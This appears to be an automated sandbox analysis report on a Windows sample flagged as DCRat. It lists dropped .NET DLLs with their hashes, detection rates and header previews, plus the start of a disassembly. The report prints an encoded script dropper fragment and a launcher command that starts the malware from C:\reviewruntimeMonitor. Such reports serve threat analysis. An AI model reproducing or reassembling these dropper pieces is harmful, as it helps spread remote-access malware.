                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34816
                                                            Entropy (8bit):5.636032516496583
                                                            Encrypted:false
                                                            SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                            MD5:996BD447A16F0A20F238A611484AFE86
                                                            SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                            SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                            SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            • Antivirus: Virustotal, Detection: 9%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):64000
                                                            Entropy (8bit):5.857602289000348
                                                            Encrypted:false
                                                            SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                            MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                            SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                            SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                            SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            • Antivirus: Virustotal, Detection: 4%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.660491370279985
                                                            Encrypted:false
                                                            SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                            MD5:240E98D38E0B679F055470167D247022
                                                            SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                            SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                            SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):38912
                                                            Entropy (8bit):5.679286635687991
                                                            Encrypted:false
                                                            SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                            MD5:9E910782CA3E88B3F87826609A21A54E
                                                            SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                            SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                            SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34304
                                                            Entropy (8bit):5.618776214605176
                                                            Encrypted:false
                                                            SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                            MD5:9B25959D6CD6097C0EF36D2496876249
                                                            SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                            SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                            SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):5.541771649974822
                                                            Encrypted:false
                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23552
                                                            Entropy (8bit):5.519109060441589
                                                            Encrypted:false
                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):46592
                                                            Entropy (8bit):5.870612048031897
                                                            Encrypted:false
                                                            SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                            MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                            SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                            SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                            SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):69632
                                                            Entropy (8bit):5.932541123129161
                                                            Encrypted:false
                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.629584586954759
                                                            Encrypted:false
                                                            SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                            MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                            SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                            SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                            SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):70144
                                                            Entropy (8bit):5.909536568846014
                                                            Encrypted:false
                                                            SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                            MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                            SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                            SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                            SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34816
                                                            Entropy (8bit):5.636032516496583
                                                            Encrypted:false
                                                            SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                            MD5:996BD447A16F0A20F238A611484AFE86
                                                            SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                            SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                            SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):38912
                                                            Entropy (8bit):5.679286635687991
                                                            Encrypted:false
                                                            SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                            MD5:9E910782CA3E88B3F87826609A21A54E
                                                            SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                            SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                            SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\o9jDrpZrgR.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1300992
                                                            Entropy (8bit):5.0586566573608085
                                                            Encrypted:false
                                                            SSDEEP:24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
                                                            MD5:295BF8D9B734730EFA567C8DA9918FE1
                                                            SHA1:09AABC018DA124BD0EBE8E1043860015AC71AA34
                                                            SHA-256:7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
                                                            SHA-512:C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, Author: Joe Security
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......T...\...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                            Process:C:\Users\user\Desktop\o9jDrpZrgR.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):90
                                                            Entropy (8bit):4.857868096041212
                                                            Encrypted:false
                                                            SSDEEP:3:b+AETbi2Vi0imEP4XLCJmPVATJp0Ax:b+vi2ViqXLC0tAT/b
                                                            MD5:027418C1F52C54C2519A267460BF1214
                                                            SHA1:F8E2F6AF10F7E8BF8A94DAF8EA953E18637C52D6
                                                            SHA-256:9B0BECAC125E51675754B4363A01CF1619854897AA2B72FCE6ECD4BAE074B286
                                                            SHA-512:93BAF1B964BF3219B45A08FF52EED669389E634B67E39FE8AC3EB913D86824074192794790802E2ACBA2B1E9119DA4520A123584D43B9BEA780BB5060711BF49
                                                            Malicious:false
                                                            Preview:%FiYvAhn%%wRBvrRgiN%..%YiFMNpGQ%"C:\reviewruntimeMonitor/BlockrefBrokerperf.exe"%lmQeqtqW%
                                                            Process:C:\Users\user\Desktop\o9jDrpZrgR.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):226
                                                            Entropy (8bit):5.8721052848438005
                                                            Encrypted:false
                                                            SSDEEP:6:GFtkvwqK+NkLzWbHyrFnBaORbM5nC++nMVO5AHI9:GFFMCzWLyhBaORbQC++nM3o9
                                                            MD5:7D4BD2B9160E289AA7B92B5F13E5000F
                                                            SHA1:FF50208F3523239764F6397B1D19909F4E0C45A8
                                                            SHA-256:BA473C76F44D3537ADDD866EB8B5E59CF3BAC1776FBA6E0131B69E914EB706C4
                                                            SHA-512:A5CC9E9C40208E2243BBF35990FA143F02EE62B6AE7EB65D5A89D8994E60378ACD497E71E76AE18709214871B91CEFDE18B38E7377BE2AA750E053B8B69EC1C5
                                                            Malicious:false
                                                            Preview:#@~^yQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vF{!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z..\b+hME.Oks+\W.kOGMzzoWDAhK95%w^LGwCk1qNK*2n"la| 8mYJS~Z~~0msk+QUEAAA==^#~@.
                                                            Process:C:\Windows\System32\PING.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):502
                                                            Entropy (8bit):4.6048426069826895
                                                            Encrypted:false
                                                            SSDEEP:12:PZ5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:LdUOAokItULVDv
                                                            MD5:3772C8A6BE7A12366E9B4E96F4489643
                                                            SHA1:4E93A70C1604E3A378B0A6330BD7C7C4CE7AB6DE
                                                            SHA-256:815727123D8C135F839CC45D3AB906B47EEAC9FE23AF26CBBB5B931E56F975AA
                                                            SHA-512:C19DF3B7E1A809E7B7093A8F8C60D7E60DEA489D8F7D614D454E815A16D7F92363B439E380FADBA1CCA0BEEED2915855BF168E79A3D6DE49DF4BE46A29759767
                                                            Malicious:false
                                                            Preview:..Pinging 045012 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):5.562432966697646
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:o9jDrpZrgR.exe
                                                            File size:1'622'827 bytes
                                                            MD5:c256204deb01c77e21ba17b5e2411245
                                                            SHA1:95ae7fb9f6710368e44a3c4e839d3d7bebbd4d5e
                                                            SHA256:f594822a45b8561a9b7a2e2ecf17558a692b1a193cf231617ba1b222723ca3ab
                                                            SHA512:f3e1f38c059ce56801382c6de631d7b90077fa77a2eb997906d2f6eef8dafe38ab041f023a11b27da41b87edb16484fb095e1053e4b01204412f3a586cd34c52
                                                            SSDEEP:24576:2TbBv5rUyXVZJQCx441vcF3iE0npCoc1cQhWdB7in6D+6:IBJLQCvvcF3KpSu
                                                            TLSH:F975F7203DEB503AF173EFB55AE0759ADA6EF6B33707999E205003864713B80DD9163A
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                            Icon Hash:1515d4d4442f2d2d
                                                            Entrypoint:0x41f530
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                            Instruction
                                                            call 00007FB4D4DA4EABh
                                                            jmp 00007FB4D4DA47BDh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            push dword ptr [ebp+08h]
                                                            mov esi, ecx
                                                            call 00007FB4D4D97607h
                                                            mov dword ptr [esi], 004356D0h
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            and dword ptr [ecx+04h], 00000000h
                                                            mov eax, ecx
                                                            and dword ptr [ecx+08h], 00000000h
                                                            mov dword ptr [ecx+04h], 004356D8h
                                                            mov dword ptr [ecx], 004356D0h
                                                            ret
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            mov esi, ecx
                                                            lea eax, dword ptr [esi+04h]
                                                            mov dword ptr [esi], 004356B8h
                                                            push eax
                                                            call 00007FB4D4DA7C4Fh
                                                            test byte ptr [ebp+08h], 00000001h
                                                            pop ecx
                                                            je 00007FB4D4DA494Ch
                                                            push 0000000Ch
                                                            push esi
                                                            call 00007FB4D4DA3F09h
                                                            pop ecx
                                                            pop ecx
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007FB4D4D97582h
                                                            push 0043BEF0h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007FB4D4DA7709h
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007FB4D4DA48C8h
                                                            push 0043C0F4h
